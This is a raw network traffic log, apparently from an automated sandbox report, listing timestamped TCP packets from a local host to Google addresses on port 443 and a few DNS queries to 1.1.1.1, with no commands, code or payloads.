                                                                                                            Nov 15, 2024 11:24:52.821796894 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.821857929 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.821929932 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.821991920 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.822052956 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.822105885 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.822443008 CET49836443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.822487116 CET44349836142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.822560072 CET49836443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.822782040 CET49836443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.822802067 CET44349836142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.850234032 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.850315094 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.850384951 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.850706100 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.850763083 CET49837443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.850774050 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.850792885 CET44349837142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.850852013 CET49837443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.851008892 CET49837443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.851022959 CET44349837142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.928621054 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.928711891 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.928721905 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.928766966 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.928771973 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.928814888 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.928819895 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.928860903 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.929572105 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.929649115 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.929713011 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.930087090 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.930120945 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.930190086 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.930392981 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.930408001 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.943803072 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.943828106 CET49836443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.943856001 CET49837443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.944170952 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.944195986 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.944264889 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.944395065 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.944420099 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.944441080 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.944459915 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.944468975 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.944704056 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.944715977 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.944860935 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.944890976 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.944952965 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.945230007 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.945247889 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.790644884 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.790832043 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.791016102 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.791085005 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.791696072 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.791737080 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.791753054 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.791799068 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.793723106 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.793730974 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.793906927 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.793936968 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.793992043 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.794048071 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.794307947 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.794368982 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.794506073 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.794723034 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:53.797606945 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.797673941 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:53.797926903 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:53.797935963 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.800178051 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:53.800183058 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.831139088 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.831370115 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:53.831757069 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:53.831758022 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:53.831814051 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.831868887 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.835330963 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:53.839337111 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.147224903 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.147358894 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.147422075 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.147510052 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.147571087 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.147701025 CET44349841142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.147773027 CET49841443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.148075104 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.148116112 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.148190975 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.148406982 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.148423910 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.151668072 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.151752949 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.151763916 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.151813030 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.151846886 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.151932001 CET44349840142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.151983023 CET49840443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.152319908 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.152379036 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.152451038 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.152683973 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:54.152704954 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.210465908 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.210576057 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.210597038 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.210642099 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.210648060 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.210695982 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.210700989 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.210741043 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.211338043 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.211419106 CET44349838142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.211479902 CET49838443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.211810112 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.211827993 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.211891890 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.212058067 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.212069988 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.359745026 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.359838963 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.359877110 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.359904051 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.359935045 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.359971046 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.359987020 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.360037088 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.360573053 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.360658884 CET44349839142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.360723972 CET49839443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.361067057 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.361125946 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.361216068 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.361515999 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:54.361546993 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.001332998 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.001487970 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.001983881 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.002042055 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.006035089 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.006041050 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.006406069 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.006504059 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.006925106 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.008917093 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.009033918 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.011687040 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.011765003 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.013555050 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.013581038 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.013963938 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.014020920 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.014388084 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.047409058 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.055337906 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.090581894 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.090711117 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.092691898 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.092705011 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.093101978 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.093163013 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.093559980 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.135330915 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.217585087 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.217856884 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.219172955 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.219227076 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.220240116 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.220323086 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.220717907 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.267330885 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.374335051 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.374397993 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.374485016 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.374516964 CET44349842142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.374564886 CET49842443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.375067949 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.375097036 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.375168085 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.375447035 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.375456095 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.382535934 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.382621050 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.382652044 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.382719994 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.382841110 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.382910013 CET44349843142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.382972002 CET49843443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.383153915 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.383187056 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.383270025 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.383435965 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:55.383451939 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.628427029 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.628540993 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.628545046 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.628578901 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.628606081 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.628654003 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.628660917 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.628701925 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.629564047 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.629652023 CET44349845142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.629729986 CET49845443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.630261898 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.630305052 CET44349851142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.630387068 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.630582094 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.630597115 CET44349851142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.631102085 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.631306887 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.631381989 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.631470919 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.631813049 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.631881952 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.631896973 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.631953001 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.631999969 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.632060051 CET44349846142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.632123947 CET49846443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.632339001 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.632405043 CET44349852142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:55.632492065 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.632632017 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:55.632662058 CET44349852142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.233066082 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.233277082 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.236048937 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.236155033 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.237687111 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.237708092 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.238579988 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.238718033 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.239079952 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.240063906 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.240180016 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.241321087 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.241410971 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.242611885 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.242639065 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.243066072 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.243144989 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.243421078 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.279334068 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.287332058 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.489676952 CET44349851142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.489774942 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:56.514050007 CET44349852142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.514143944 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:56.599174023 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.599296093 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.599462032 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.599539042 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.599570990 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.599627018 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.719664097 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.719793081 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.719805002 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.719867945 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.724976063 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.725066900 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:56.725157022 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:56.725212097 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.991406918 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.991487980 CET44349850142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.991523981 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.991565943 CET49850443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.991689920 CET49849443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.991729975 CET44349849142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.992502928 CET49854443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.992541075 CET44349854142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.992621899 CET49854443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.992743015 CET49855443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.992831945 CET44349855142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.992898941 CET49855443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.993154049 CET49854443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.993168116 CET44349854142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.993541002 CET49855443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:00.993618011 CET44349855142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.995587111 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:25:00.995610952 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:25:00.995651007 CET44349851142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.995677948 CET44349852142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.996602058 CET44349852142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.996625900 CET44349851142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:25:00.996682882 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:25:00.996717930 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:25:01.843790054 CET44349855142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:01.843978882 CET49855443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:01.858946085 CET44349854142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:25:01.859009981 CET49854443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:02.973295927 CET4977180192.168.2.1669.42.215.252
                                                                                                            Nov 15, 2024 11:25:02.974498987 CET49851443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:25:02.974518061 CET49852443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:25:02.974586964 CET49854443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:25:02.974612951 CET49855443192.168.2.16142.250.185.78
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 15, 2024 11:23:34.683109045 CET5978253192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:23:34.690319061 CET53597821.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.561999083 CET5028753192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:23:35.569880009 CET53502871.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.575030088 CET6479353192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:23:35.583574057 CET53647931.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.974428892 CET5509353192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:23:35.981528997 CET53550931.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.946686029 CET5798453192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:23:42.092784882 CET53579841.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:23:46.594997883 CET4932753192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:23:46.602283001 CET53493271.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:24:36.520792007 CET5908953192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:24:36.527861118 CET53590891.1.1.1192.168.2.16
